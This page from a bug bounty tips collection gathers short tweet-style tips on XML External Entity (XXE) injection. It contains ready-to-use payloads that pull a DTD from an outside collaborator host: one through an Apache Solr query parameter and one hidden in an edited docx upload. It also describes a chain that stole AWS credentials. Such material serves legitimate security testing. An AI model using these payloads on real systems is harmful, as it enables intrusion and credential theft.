Book of BugBounty Tips
  • Introduction
  • OSINT / Recon
  • API
  • Cross Site Request Forgery (CSRF)
  • Server Side Request Forgery (SSRF)
  • Sensitive Information Disclosure
  • Cross Site Scripting (XSS)
  • CRLF
  • Remote Code Execution (RCE)
  • Email Bypass
  • File Upload
  • Open Redirect
  • Insecure Direct Object Reference (IDOR)
  • Injection
  • XXE
  • Local / Remote File Inclusion
  • Authentication / Authorization
  • Account Takeover
  • Application Login
  • Clickjacking
  • Parameter Pollution
  • Fuzzing
  • Application Logic Bypasses
  • Bypasses
  • Mobile
  • Password Reset
  • Web Cache
  • Server Side Template Injection
  • Tips from @EdOverflow
  • Tips From @intigriti
  • Hackpack From @yeswehack
  • Tips from @YogoshaOfficial
  • Tips from @Jhaddix
  • Tips from Ben (@nahamsec)
  • Tips from Other Sources
  • Tips from Blog posts / other hunters
  • Others
  • Bugbounty Related Websites / Blogs
  • Docker and k8s
  • Tweets Collection by @Pentesterland
  • Windows
  • Linux
  • Burp suite
  • Scope Based Recon Tips
Powered by GitBook
On this page

XXE

PreviousInjectionNextLocal / Remote File Inclusion

Last updated 4 years ago

XXE
change password func -> JSON
converted to XML -> 200 OK
created dtd file on my ec2 and started webserver on port 80
crafted a XXE payload!
bounty!
Always convert POST/PUT/PATCH body to xml and resend req, don't forget to change the content-type.
see an apache solr GET/POST to /select ? Set the 'q' parameter to the following for an XXE injection: /select?q={!xmlparser v='<!DOCTYPE a SYSTEM "http://collab.burp.net"><a></a>'} - https://packetstormsecurity.com/files/144678/Apache-Solr-7.0.1-XXE-Injection-Code-Execution.html… #BugBounty
#bugbountytip Company fixed an XXE by blocking arbitrary URL(s) to grab an SVG? Try & bypass it by embedding the SVG using the Data URI protocol handler [data:image/svg+xml;base64,XXE_PAYLOAD], most of the time it would work! #BugBounty #TogetherWeHitHarder #infosec #infosecurity
https://twitter.com/11xuxx/status/1250764273623629826
XXE by injecting METADATA in Image bytes --> Blind SSRF via local dtd --> grabbed AWS EC2 credentials blindly --> Powned #bugbountytips #bugbountytip
jobs.targ.com site fills in personal info by uploading cv & parsing. Accepted docx, pdf, etc. 1. Unzip docx & edit word/document.xml 3. Add <!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://burp.collab.net/mal.dtd"> %xxe;]> 3. Upload 4. Profit! #BugBounty
#BugBountyTip time: when you see a POST request made with JSON, convert this to XML and test for XXE. You can use "Content-type converter" extension on@Burp_Suite to do achieve this!
https://twitter.com/Kei0x/status/1172267556226445313